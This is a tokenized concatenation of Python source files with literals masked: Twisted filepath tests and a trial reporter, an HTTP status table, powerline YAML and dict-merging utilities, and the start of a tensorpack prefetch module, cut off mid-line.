<EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> nonexistent . requireCreate ( True ) <EOL> nonexistent . open ( '<STR_LIT:w>' ) . close ( ) <EOL> existent = nonexistent <EOL> del nonexistent <EOL> self . assertRaises ( ( OSError , IOError ) , existent . open ) <EOL> def test_openWithExplicitBinaryMode ( self ) : <EOL> """<STR_LIT>""" <EOL> writer = self . path . child ( b'<STR_LIT>' ) <EOL> file = writer . open ( '<STR_LIT:wb>' ) <EOL> file . write ( b'<STR_LIT>' ) <EOL> file . close ( ) <EOL> self . assertTrue ( writer . exists ) <EOL> def test_openWithRedundantExplicitBinaryModes ( self ) : <EOL> """<STR_LIT>""" <EOL> writer = self . path . child ( b'<STR_LIT>' ) <EOL> file = writer . open ( '<STR_LIT>' ) <EOL> file . write ( b'<STR_LIT>' ) <EOL> file . close ( ) <EOL> self . assertTrue ( writer . exists ) <EOL> def test_existsCache ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . assertEqual ( fp . exists ( ) , False ) <EOL> fp . makedirs ( ) <EOL> self . assertEqual ( fp . exists ( ) , True ) <EOL> def test_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:5> ) <EOL> fObj = open ( fp . path , '<STR_LIT:wb>' ) <EOL> fObj . write ( b"<STR_LIT>" ) <EOL> fObj . close ( ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:5> ) <EOL> fp . changed ( ) <EOL> self . assertEqual ( fp . statinfo , None ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:8> ) <EOL> def test_getPermissions_POSIX ( self ) : <EOL> """<STR_LIT>""" <EOL> for mode in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( mode ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) , <EOL> filepath . Permissions ( mode ) ) <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( <NUM_LIT> ) <EOL> self . assertEqual ( <EOL> self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) . shorthand ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_deprecateStatinfoGetter ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . statinfo <EOL> warningInfo = self . flushWarnings ( [ self . test_deprecateStatinfoGetter ] ) <EOL> self . assertEquals ( len ( warningInfo ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEquals ( <EOL> warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_deprecateStatinfoSetter ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . statinfo = None <EOL> warningInfo = self . flushWarnings ( [ self . test_deprecateStatinfoSetter ] ) <EOL> self . assertEquals ( len ( warningInfo ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEquals ( <EOL> warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_deprecateStatinfoSetterSets ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . statinfo = None <EOL> self . assertEquals ( fp . statinfo , None ) <EOL> def test_filePathNotDeprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> filepath . FilePath ( self . mktemp ( ) ) <EOL> warningInfo = self . flushWarnings ( [ self . test_filePathNotDeprecated ] ) <EOL> self . assertEquals ( warningInfo , [ ] ) <EOL> def test_getPermissions_Windows ( self ) : <EOL> """<STR_LIT>""" <EOL> self . addCleanup ( self . path . child ( b"<STR_LIT>" ) . chmod , <NUM_LIT> ) <EOL> for mode in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( mode ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) , <EOL> filepath . Permissions ( mode ) ) <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( <NUM_LIT> ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) . shorthand ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_whetherBlockOrSocket ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . path . isBlockDevice ( ) ) <EOL> self . assertFalse ( self . path . isSocket ( ) ) <EOL> def test_statinfoBitsNotImplementedInWindows ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotImplementedError , self . path . getInodeNumber ) <EOL> self . assertRaises ( NotImplementedError , self . path . getDevice ) <EOL> self . assertRaises ( NotImplementedError , self . path . getNumberOfHardLinks ) <EOL> self . assertRaises ( NotImplementedError , self . path . getUserID ) <EOL> self . assertRaises ( NotImplementedError , self . path . getGroupID ) <EOL> def test_statinfoBitsAreNumbers ( self ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> numbers = int <EOL> else : <EOL> numbers = ( int , long ) <EOL> c = self . path . child ( b'<STR_LIT>' ) <EOL> for p in self . path , c : <EOL> self . assertIsInstance ( p . getInodeNumber ( ) , numbers ) <EOL> self . assertIsInstance ( p . getDevice ( ) , numbers ) <EOL> self . assertIsInstance ( p . getNumberOfHardLinks ( ) , numbers ) <EOL> self . assertIsInstance ( p . getUserID ( ) , numbers ) <EOL> self . assertIsInstance ( p . getGroupID ( ) , numbers ) <EOL> self . assertEqual ( self . path . getUserID ( ) , c . getUserID ( ) ) <EOL> self . assertEqual ( self . path . getGroupID ( ) , c . getGroupID ( ) ) <EOL> def test_statinfoNumbersAreValid ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeStat : <EOL> st_ino = <NUM_LIT:200> <EOL> st_dev = <NUM_LIT> <EOL> st_nlink = <NUM_LIT> <EOL> st_uid = <NUM_LIT> <EOL> st_gid = <NUM_LIT> <EOL> fake = FakeStat ( ) <EOL> def fakeRestat ( * args , ** kwargs ) : <EOL> self . path . _statinfo = fake <EOL> self . path . restat = fakeRestat <EOL> self . path . _statinfo = None <EOL> self . assertEqual ( self . path . getInodeNumber ( ) , fake . st_ino ) <EOL> self . assertEqual ( self . path . getDevice ( ) , fake . st_dev ) <EOL> self . assertEqual ( self . path . getNumberOfHardLinks ( ) , fake . st_nlink ) <EOL> self . assertEqual ( self . path . getUserID ( ) , fake . st_uid ) <EOL> self . assertEqual ( self . path . getGroupID ( ) , fake . st_gid ) <EOL> if platform . isWindows ( ) : <EOL> test_statinfoBitsAreNumbers . skip = True <EOL> test_statinfoNumbersAreValid . skip = True <EOL> test_getPermissions_POSIX . skip = True <EOL> else : <EOL> test_statinfoBitsNotImplementedInWindows . skip = "<STR_LIT>" <EOL> test_getPermissions_Windows . skip = "<STR_LIT>" <EOL> class SetContentTests ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_write ( self ) : <EOL> """<STR_LIT>""" <EOL> pathString = self . mktemp ( ) <EOL> path = filepath . FilePath ( pathString ) <EOL> path . setContent ( b"<STR_LIT>" ) <EOL> with open ( pathString , "<STR_LIT:rb>" ) as fObj : <EOL> contents = fObj . read ( ) <EOL> self . assertEqual ( b"<STR_LIT>" , contents ) <EOL> def test_fileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = ExplodingFilePath ( b"<STR_LIT>" ) <EOL> self . assertRaises ( IOError , fp . setContent , b"<STR_LIT>" ) <EOL> self . assertTrue ( fp . fp . closed ) <EOL> def test_nameCollision ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = TrackingFilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> openedSiblings = fp . openedPaths ( ) <EOL> self . assertEqual ( len ( openedSiblings ) , <NUM_LIT:2> ) <EOL> self . assertNotEqual ( openedSiblings [ <NUM_LIT:0> ] , openedSiblings [ <NUM_LIT:1> ] ) <EOL> def _assertOneOpened ( self , fp , extension ) : <EOL> """<STR_LIT>""" <EOL> opened = fp . openedPaths ( ) <EOL> self . assertEqual ( len ( opened ) , <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . assertTrue ( <EOL> opened [ <NUM_LIT:0> ] . basename ( ) . endswith ( extension ) , <EOL> "<STR_LIT>" % ( <EOL> opened [ <NUM_LIT:0> ] . basename ( ) , extension ) ) <EOL> def test_defaultExtension ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = TrackingFilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT:hello>" ) <EOL> self . _assertOneOpened ( fp , b"<STR_LIT>" ) <EOL> def test_customExtension ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = TrackingFilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> self . _assertOneOpened ( fp , b"<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import implementer <EOL> from twisted . trial . itrial import IReporter <EOL> from twisted . python . components import proxyForInterface <EOL> @ implementer ( IReporter ) <EOL> class DistReporter ( proxyForInterface ( IReporter ) ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , original ) : <EOL> super ( DistReporter , self ) . __init__ ( original ) <EOL> self . running = { } <EOL> def startTest ( self , test ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] = [ ] <EOL> self . running [ test . id ( ) ] . append ( ( self . original . startTest , test ) ) <EOL> def addFailure ( self , test , fail ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addFailure , <EOL> test , fail ) ) <EOL> def addError ( self , test , error ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addError , <EOL> test , error ) ) <EOL> def addSkip ( self , test , reason ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addSkip , <EOL> test , reason ) ) <EOL> def addUnexpectedSuccess ( self , test , todo ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addUnexpectedSuccess , <EOL> test , todo ) ) <EOL> def addExpectedFailure ( self , test , error , todo ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addExpectedFailure , <EOL> test , error , todo ) ) <EOL> def addSuccess ( self , test ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addSuccess , test ) ) <EOL> def stopTest ( self , test ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . stopTest , test ) ) <EOL> for step in self . running [ test . id ( ) ] : <EOL> apply ( step [ <NUM_LIT:0> ] , step [ <NUM_LIT:1> : ] ) <EOL> del self . running [ test . id ( ) ] </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> class FooTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_first ( self ) : <EOL> pass <EOL> def test_second ( self ) : <EOL> pass <EOL> def test_third ( self ) : <EOL> pass <EOL> def test_fourth ( self ) : <EOL> pass <EOL> class BazTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_baz ( self ) : <EOL> pass <EOL> class BarTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_bar ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> _CONTINUE = <NUM_LIT:100> <EOL> SWITCHING = <NUM_LIT> <EOL> OK = <NUM_LIT:200> <EOL> CREATED = <NUM_LIT> <EOL> ACCEPTED = <NUM_LIT> <EOL> NON_AUTHORITATIVE_INFORMATION = <NUM_LIT> <EOL> NO_CONTENT = <NUM_LIT> <EOL> RESET_CONTENT = <NUM_LIT> <EOL> PARTIAL_CONTENT = <NUM_LIT> <EOL> MULTI_STATUS = <NUM_LIT> <EOL> MULTIPLE_CHOICE = <NUM_LIT> <EOL> MOVED_PERMANENTLY = <NUM_LIT> <EOL> FOUND = <NUM_LIT> <EOL> SEE_OTHER = <NUM_LIT> <EOL> NOT_MODIFIED = <NUM_LIT> <EOL> USE_PROXY = <NUM_LIT> <EOL> TEMPORARY_REDIRECT = <NUM_LIT> <EOL> BAD_REQUEST = <NUM_LIT> <EOL> UNAUTHORIZED = <NUM_LIT> <EOL> PAYMENT_REQUIRED = <NUM_LIT> <EOL> FORBIDDEN = <NUM_LIT> <EOL> NOT_FOUND = <NUM_LIT> <EOL> NOT_ALLOWED = <NUM_LIT> <EOL> NOT_ACCEPTABLE = <NUM_LIT> <EOL> PROXY_AUTH_REQUIRED = <NUM_LIT> <EOL> REQUEST_TIMEOUT = <NUM_LIT> <EOL> CONFLICT = <NUM_LIT> <EOL> GONE = <NUM_LIT> <EOL> LENGTH_REQUIRED = <NUM_LIT> <EOL> PRECONDITION_FAILED = <NUM_LIT> <EOL> REQUEST_ENTITY_TOO_LARGE = <NUM_LIT> <EOL> REQUEST_URI_TOO_LONG = <NUM_LIT> <EOL> UNSUPPORTED_MEDIA_TYPE = <NUM_LIT> <EOL> REQUESTED_RANGE_NOT_SATISFIABLE = <NUM_LIT> <EOL> EXPECTATION_FAILED = <NUM_LIT> <EOL> INTERNAL_SERVER_ERROR = <NUM_LIT> <EOL> NOT_IMPLEMENTED = <NUM_LIT> <EOL> BAD_GATEWAY = <NUM_LIT> <EOL> SERVICE_UNAVAILABLE = <NUM_LIT> <EOL> GATEWAY_TIMEOUT = <NUM_LIT> <EOL> HTTP_VERSION_NOT_SUPPORTED = <NUM_LIT> <EOL> INSUFFICIENT_STORAGE_SPACE = <NUM_LIT> <EOL> NOT_EXTENDED = <NUM_LIT> <EOL> RESPONSES = { <EOL> _CONTINUE : "<STR_LIT>" , <EOL> SWITCHING : "<STR_LIT>" , <EOL> OK : "<STR_LIT:OK>" , <EOL> CREATED : "<STR_LIT>" , <EOL> ACCEPTED : "<STR_LIT>" , <EOL> NON_AUTHORITATIVE_INFORMATION : "<STR_LIT>" , <EOL> NO_CONTENT : "<STR_LIT>" , <EOL> RESET_CONTENT : "<STR_LIT>" , <EOL> PARTIAL_CONTENT : "<STR_LIT>" , <EOL> MULTI_STATUS : "<STR_LIT>" , <EOL> MULTIPLE_CHOICE : "<STR_LIT>" , <EOL> MOVED_PERMANENTLY : "<STR_LIT>" , <EOL> FOUND : "<STR_LIT>" , <EOL> SEE_OTHER : "<STR_LIT>" , <EOL> NOT_MODIFIED : "<STR_LIT>" , <EOL> USE_PROXY : "<STR_LIT>" , <EOL> TEMPORARY_REDIRECT : "<STR_LIT>" , <EOL> BAD_REQUEST : "<STR_LIT>" , <EOL> UNAUTHORIZED : "<STR_LIT>" , <EOL> PAYMENT_REQUIRED : "<STR_LIT>" , <EOL> FORBIDDEN : "<STR_LIT>" , <EOL> NOT_FOUND : "<STR_LIT>" , <EOL> NOT_ALLOWED : "<STR_LIT>" , <EOL> NOT_ACCEPTABLE : "<STR_LIT>" , <EOL> PROXY_AUTH_REQUIRED : "<STR_LIT>" , <EOL> REQUEST_TIMEOUT : "<STR_LIT>" , <EOL> CONFLICT : "<STR_LIT>" , <EOL> GONE : "<STR_LIT>" , <EOL> LENGTH_REQUIRED : "<STR_LIT>" , <EOL> PRECONDITION_FAILED : "<STR_LIT>" , <EOL> REQUEST_ENTITY_TOO_LARGE : "<STR_LIT>" , <EOL> REQUEST_URI_TOO_LONG : "<STR_LIT>" , <EOL> UNSUPPORTED_MEDIA_TYPE : "<STR_LIT>" , <EOL> REQUESTED_RANGE_NOT_SATISFIABLE : "<STR_LIT>" , <EOL> EXPECTATION_FAILED : "<STR_LIT>" , <EOL> INTERNAL_SERVER_ERROR : "<STR_LIT>" , <EOL> NOT_IMPLEMENTED : "<STR_LIT>" , <EOL> BAD_GATEWAY : "<STR_LIT>" , <EOL> SERVICE_UNAVAILABLE : "<STR_LIT>" , <EOL> GATEWAY_TIMEOUT : "<STR_LIT>" , <EOL> HTTP_VERSION_NOT_SUPPORTED : "<STR_LIT>" , <EOL> INSUFFICIENT_STORAGE_SPACE : "<STR_LIT>" , <EOL> NOT_EXTENDED : "<STR_LIT>" <EOL> } </s>
<s> from __future__ import ( unicode_literals , division , absolute_import , print_function ) <EOL> REMOVE_THIS_KEY = object ( ) <EOL> def mergeargs ( argvalue , remove = False ) : <EOL> if not argvalue : <EOL> return None <EOL> r = { } <EOL> for subval in argvalue : <EOL> mergedicts ( r , dict ( [ subval ] ) , remove = remove ) <EOL> return r <EOL> def _clear_special_values ( d ) : <EOL> '''<STR_LIT>''' <EOL> l = [ d ] <EOL> while l : <EOL> i = l . pop ( ) <EOL> pops = [ ] <EOL> for k , v in i . items ( ) : <EOL> if v is REMOVE_THIS_KEY : <EOL> pops . append ( k ) <EOL> elif isinstance ( v , dict ) : <EOL> l . append ( v ) <EOL> for k in pops : <EOL> i . pop ( k ) <EOL> def mergedicts ( d1 , d2 , remove = True ) : <EOL> '''<STR_LIT>''' <EOL> _setmerged ( d1 , d2 ) <EOL> for k in d2 : <EOL> if k in d1 and isinstance ( d1 [ k ] , dict ) and isinstance ( d2 [ k ] , dict ) : <EOL> mergedicts ( d1 [ k ] , d2 [ k ] , remove ) <EOL> elif remove and d2 [ k ] is REMOVE_THIS_KEY : <EOL> d1 . pop ( k , None ) <EOL> else : <EOL> if remove and isinstance ( d2 [ k ] , dict ) : <EOL> _clear_special_values ( d2 [ k ] ) <EOL> d1 [ k ] = d2 [ k ] <EOL> def mergedefaults ( d1 , d2 ) : <EOL> '''<STR_LIT>''' <EOL> for k in d2 : <EOL> if k in d1 and isinstance ( d1 [ k ] , dict ) and isinstance ( d2 [ k ] , dict ) : <EOL> mergedefaults ( d1 [ k ] , d2 [ k ] ) <EOL> else : <EOL> d1 . setdefault ( k , d2 [ k ] ) <EOL> def _setmerged ( d1 , d2 ) : <EOL> if hasattr ( d1 , '<STR_LIT>' ) : <EOL> d1 . setmerged ( d2 ) <EOL> def mergedicts_copy ( d1 , d2 ) : <EOL> '''<STR_LIT>''' <EOL> ret = d1 . copy ( ) <EOL> _setmerged ( ret , d2 ) <EOL> for k in d2 : <EOL> if k in d1 and isinstance ( d1 [ k ] , dict ) and isinstance ( d2 [ k ] , dict ) : <EOL> ret [ k ] = mergedicts_copy ( d1 [ k ] , d2 [ k ] ) <EOL> else : <EOL> ret [ k ] = d2 [ k ] <EOL> return ret <EOL> def updated ( d , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> d = d . copy ( ) <EOL> d . update ( * args , ** kwargs ) <EOL> return d </s>
<s> from __future__ import ( unicode_literals , division , absolute_import , print_function ) <EOL> import collections <EOL> import types <EOL> from functools import wraps <EOL> from powerline . lint . markedjson . error import MarkedError <EOL> from powerline . lint . markedjson import nodes <EOL> from powerline . lint . markedjson . markedvalue import gen_marked_value <EOL> from powerline . lib . unicode import unicode <EOL> def marked ( func ) : <EOL> @ wraps ( func ) <EOL> def f ( self , node , * args , ** kwargs ) : <EOL> return gen_marked_value ( func ( self , node , * args , ** kwargs ) , node . start_mark ) <EOL> return f <EOL> class ConstructorError ( MarkedError ) : <EOL> pass <EOL> class BaseConstructor : <EOL> yaml_constructors = { } <EOL> def __init__ ( self ) : <EOL> self . constructed_objects = { } <EOL> self . state_generators = [ ] <EOL> self . deep_construct = False <EOL> def check_data ( self ) : <EOL> return self . check_node ( ) <EOL> def get_data ( self ) : <EOL> if self . check_node ( ) : <EOL> return self . construct_document ( self . get_node ( ) ) <EOL> def get_single_data ( self ) : <EOL> node = self . get_single_node ( ) <EOL> if node is not None : <EOL> return self . construct_document ( node ) <EOL> return None <EOL> def construct_document ( self , node ) : <EOL> data = self . construct_object ( node ) <EOL> while self . state_generators : <EOL> state_generators = self . state_generators <EOL> self . state_generators = [ ] <EOL> for generator in state_generators : <EOL> for dummy in generator : <EOL> pass <EOL> self . constructed_objects = { } <EOL> self . deep_construct = False <EOL> return data <EOL> def construct_object ( self , node , deep = False ) : <EOL> if node in self . constructed_objects : <EOL> return self . constructed_objects [ node ] <EOL> if deep : <EOL> old_deep = self . deep_construct <EOL> self . deep_construct = True <EOL> constructor = None <EOL> tag_suffix = None <EOL> if node . tag in self . yaml_constructors : <EOL> constructor = self . yaml_constructors [ node . tag ] <EOL> else : <EOL> raise ConstructorError ( None , None , '<STR_LIT>' % node . tag ) <EOL> if tag_suffix is None : <EOL> data = constructor ( self , node ) <EOL> else : <EOL> data = constructor ( self , tag_suffix , node ) <EOL> if isinstance ( data , types . GeneratorType ) : <EOL> generator = data <EOL> data = next ( generator ) <EOL> if self . deep_construct : <EOL> for dummy in generator : <EOL> pass <EOL> else : <EOL> self . state_generators . append ( generator ) <EOL> self . constructed_objects [ node ] = data <EOL> if deep : <EOL> self . deep_construct = old_deep <EOL> return data <EOL> @ marked <EOL> def construct_scalar ( self , node ) : <EOL> if not isinstance ( node , nodes . ScalarNode ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . id , <EOL> node . start_mark <EOL> ) <EOL> return node . value <EOL> def construct_sequence ( self , node , deep = False ) : <EOL> if not isinstance ( node , nodes . SequenceNode ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . id , <EOL> node . start_mark <EOL> ) <EOL> return [ <EOL> self . construct_object ( child , deep = deep ) <EOL> for child in node . value <EOL> ] <EOL> @ marked <EOL> def construct_mapping ( self , node , deep = False ) : <EOL> if not isinstance ( node , nodes . MappingNode ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . id , <EOL> node . start_mark <EOL> ) <EOL> mapping = { } <EOL> for key_node , value_node in node . value : <EOL> key = self . construct_object ( key_node , deep = deep ) <EOL> if not isinstance ( key , collections . Hashable ) : <EOL> self . echoerr ( <EOL> '<STR_LIT>' , node . start_mark , <EOL> '<STR_LIT>' , key_node . start_mark <EOL> ) <EOL> continue <EOL> elif type ( key . value ) != unicode : <EOL> self . echoerr ( <EOL> '<STR_LIT>' , node . start_mark , <EOL> '<STR_LIT>' , key_node . start_mark <EOL> ) <EOL> continue <EOL> elif key in mapping : <EOL> self . echoerr ( <EOL> '<STR_LIT>' , node . start_mark , <EOL> '<STR_LIT>' , key_node . start_mark <EOL> ) <EOL> continue <EOL> value = self . construct_object ( value_node , deep = deep ) <EOL> mapping [ key ] = value <EOL> return mapping <EOL> @ classmethod <EOL> def add_constructor ( cls , tag , constructor ) : <EOL> if '<STR_LIT>' not in cls . __dict__ : <EOL> cls . yaml_constructors = cls . yaml_constructors . copy ( ) <EOL> cls . yaml_constructors [ tag ] = constructor <EOL> class Constructor ( BaseConstructor ) : <EOL> def construct_scalar ( self , node ) : <EOL> if isinstance ( node , nodes . MappingNode ) : <EOL> for key_node , value_node in node . value : <EOL> if key_node . tag == '<STR_LIT>' : <EOL> return self . construct_scalar ( value_node ) <EOL> return BaseConstructor . construct_scalar ( self , node ) <EOL> def flatten_mapping ( self , node ) : <EOL> merge = [ ] <EOL> index = <NUM_LIT:0> <EOL> while index < len ( node . value ) : <EOL> key_node , value_node = node . value [ index ] <EOL> if key_node . tag == '<STR_LIT>' : <EOL> del node . value [ index ] <EOL> if isinstance ( value_node , nodes . MappingNode ) : <EOL> self . flatten_mapping ( value_node ) <EOL> merge . extend ( value_node . value ) <EOL> elif isinstance ( value_node , nodes . SequenceNode ) : <EOL> submerge = [ ] <EOL> for subnode in value_node . value : <EOL> if not isinstance ( subnode , nodes . MappingNode ) : <EOL> raise ConstructorError ( <EOL> '<STR_LIT>' , <EOL> node . start_mark , <EOL> '<STR_LIT>' % subnode . id , <EOL> subnode . start_mark <EOL> ) <EOL> self . flatten_mapping ( subnode ) <EOL> submerge . append ( subnode . value ) <EOL> submerge . reverse ( ) <EOL> for value in submerge : <EOL> merge . extend ( value ) <EOL> else : <EOL> raise ConstructorError ( <EOL> '<STR_LIT>' , <EOL> node . start_mark , <EOL> ( '<STR_LIT>' % value_node . id ) , <EOL> value_node . start_mark <EOL> ) <EOL> elif key_node . tag == '<STR_LIT>' : <EOL> key_node . tag = '<STR_LIT>' <EOL> index += <NUM_LIT:1> <EOL> else : <EOL> index += <NUM_LIT:1> <EOL> if merge : <EOL> node . value = merge + node . value <EOL> def construct_mapping ( self , node , deep = False ) : <EOL> if isinstance ( node , nodes . MappingNode ) : <EOL> self . flatten_mapping ( node ) <EOL> return BaseConstructor . construct_mapping ( self , node , deep = deep ) <EOL> @ marked <EOL> def construct_yaml_null ( self , node ) : <EOL> self . construct_scalar ( node ) <EOL> return None <EOL> @ marked <EOL> def construct_yaml_bool ( self , node ) : <EOL> value = self . construct_scalar ( node ) . value <EOL> return bool ( value ) <EOL> @ marked <EOL> def construct_yaml_int ( self , node ) : <EOL> value = self . construct_scalar ( node ) . value <EOL> sign = + <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sign = - <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> value = value [ <NUM_LIT:1> : ] <EOL> if value == '<STR_LIT:0>' : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return sign * int ( value ) <EOL> @ marked <EOL> def construct_yaml_float ( self , node ) : <EOL> value = self . construct_scalar ( node ) . value <EOL> sign = + <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sign = - <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> value = value [ <NUM_LIT:1> : ] <EOL> else : <EOL> return sign * float ( value ) <EOL> def construct_yaml_str ( self , node ) : <EOL> return self . construct_scalar ( node ) <EOL> def construct_yaml_seq ( self , node ) : <EOL> data = gen_marked_value ( [ ] , node . start_mark ) <EOL> yield data <EOL> data . extend ( self . construct_sequence ( node ) ) <EOL> def construct_yaml_map ( self , node ) : <EOL> data = gen_marked_value ( { } , node . start_mark ) <EOL> yield data <EOL> value = self . construct_mapping ( node ) <EOL> data . update ( value ) <EOL> def construct_undefined ( self , node ) : <EOL> raise ConstructorError ( <EOL> None , None , <EOL> '<STR_LIT>' % node . tag , <EOL> node . start_mark <EOL> ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_null ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_bool ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_int ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_float ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_str ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_seq ) <EOL> Constructor . add_constructor ( <EOL> '<STR_LIT>' , Constructor . construct_yaml_map ) <EOL> Constructor . add_constructor ( <EOL> None , Constructor . construct_undefined ) </s>
<s> from __future__ import ( unicode_literals , division , absolute_import , print_function ) <EOL> try : <EOL> import vim <EOL> except ImportError : <EOL> vim = object ( ) <EOL> from powerline . bindings . vim import bufvar_exists <EOL> from powerline . segments . vim import window_cached <EOL> @ window_cached <EOL> def nerdtree ( pl ) : <EOL> '''<STR_LIT>''' <EOL> if not bufvar_exists ( None , '<STR_LIT>' ) : <EOL> return None <EOL> path_str = vim . eval ( '<STR_LIT>' ) <EOL> return [ { <EOL> '<STR_LIT>' : path_str , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } ] </s>
<s> from pkgutil import walk_packages <EOL> import os <EOL> def _global_import ( name ) : <EOL> p = __import__ ( name , globals ( ) , locals ( ) , level = <NUM_LIT:1> ) <EOL> lst = p . __all__ if '<STR_LIT>' in dir ( p ) else dir ( p ) <EOL> del globals ( ) [ name ] <EOL> for k in lst : <EOL> globals ( ) [ k ] = p . __dict__ [ k ] <EOL> for _ , module_name , _ in walk_packages ( <EOL> [ os . path . dirname ( __file__ ) ] ) : <EOL> if not module_name . startswith ( '<STR_LIT:_>' ) : <EOL> _global_import ( module_name ) </s>
<s> import multiprocessing <EOL> from six . moves import range <EOL> from . base import ProxyDataFlow <EOL> from . . utils . concurrency import ensure_proc_terminate <EOL> from . . utils import logger <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class PrefetchProcess ( multiprocessing . Process ) : <EOL> def __init__ ( self , ds , queue ) : <EOL> """<STR_LIT>""" <EOL> super ( PrefetchProcess , self ) . __init__ ( ) <EOL> self . ds = ds <EOL> self . queue = queue <EOL> def run ( self ) : <EOL> self . ds . reset_state ( ) <EOL> while True : <EOL> for dp in self . ds . get_data ( ) : <EOL> self . queue . put ( dp ) <EOL> class PrefetchData ( ProxyDataFlow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ds , nr_prefetch , nr_proc = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> super ( PrefetchData , self ) . __init__ ( ds ) <EOL> self . _size = self . size ( ) <EOL> self . nr_proc = nr_proc <EOL> self . 